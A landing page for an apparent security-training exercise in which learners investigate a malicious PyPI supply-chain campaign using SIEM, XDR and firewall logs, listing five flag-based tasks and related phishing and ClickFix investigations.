Skip to main content
Supply Chain Investigation: The poweRAT PyPI Campaign operation cover
IntermediateSIEMXDRFirewall

Supply Chain Investigation: The poweRAT PyPI Campaign

Investigate a sophisticated supply chain attack targeting Python developers through malicious PyPI packages. You will analyze a multi-stage infection chain involving obfuscated PowerShell, Cloudflare Tunnels, and a Flask-based RAT used for data exfiltration and remote control.

1h
5 tasks
150 points
Free

Start this operation

Create your free account and begin immediately.

Get Early Access — Free

Free forever — no credit card required

Investigation Tasks

Complete each task by investigating alerts and submitting your findings.

1

Task 1: Identify Malicious Package Installation

20
SOC{package_name} - The name of the malicious PyPI packageHint available
2

Task 2: Analyze PowerShell Download Cradle

30
SOC{url} - The full URL of the ZIP file downloadHint available
3

Task 3: Detect Persistence Mechanism

25
SOC{filename.lnk} - The name of the persistence fileHint available
4

Task 4: Investigate Tunneling Activity

40
SOC{domain.com} - The legitimate domain used for tunnelingHint available
5

Task 5: Trace Data Exfiltration

35
SOC{ip_address} - The IP address associated with the exfiltration serviceHint available

5 tasks · 150 points total

Start investigation

Training Tools

SIEM Console

Log analysis & SPL queries

XDR Console

Endpoint detection & response

Firewall Console

Network traffic analysis

Skills You'll Build

Investigate realistic security alerts
SIEM log analysis
XDR log analysis
Firewall log analysis
MITRE ATT&CK technique identification
Triage decisions: escalate, investigate, or close
Evidence collection and documentation
Job-ready incident response methodology
Intermediate

Requires foundational alert triage skills. Multiple data sources to correlate.

Prerequisites

  • Basic understanding of security alerts
  • Familiarity with SIEM concepts
  • Familiarity with XDR concepts
  • Familiarity with Firewall concepts

Ready to investigate?

Create your free account and begin immediately.

Get Early Access — Free

Free forever — no credit card required

More Operations

View all
BeginnerSIEMXDR

ClickFix: The Fake CAPTCHA Trap

Investigate a modern 'ClickFix' social engineering attack where a user was tricked into executing a malicious PowerShell command via a fake CAPTCHA interface. You will analyze SIEM and XDR telemetry to trace the infection from the initial web lure to the deployment of an infostealer.

30m20 pts
BeginnerSIEMXDR

Phishing Investigation: ZipLine Supply Chain Campaign

Investigate a sophisticated social engineering campaign targeting manufacturing supply chains. You will analyze a 'reversed' phishing flow where attackers use 'Contact Us' forms to trick employees into initiating email conversations, leading to the deployment of the custom MixShell in-memory implant via DNS tunneling.

45m75 pts
BeginnerSIEM

Credential Harvesting: The Lookalike Login

An investigation into a modern phishing campaign targeting critical infrastructure. You will analyze email headers for domain spoofing, identify 'Paste and Run' execution chains, and track the delivery of the LummaC2 information stealer through SIEM logs.

30m20 pts

We use cookies to improve your experience and measure usage. Learn more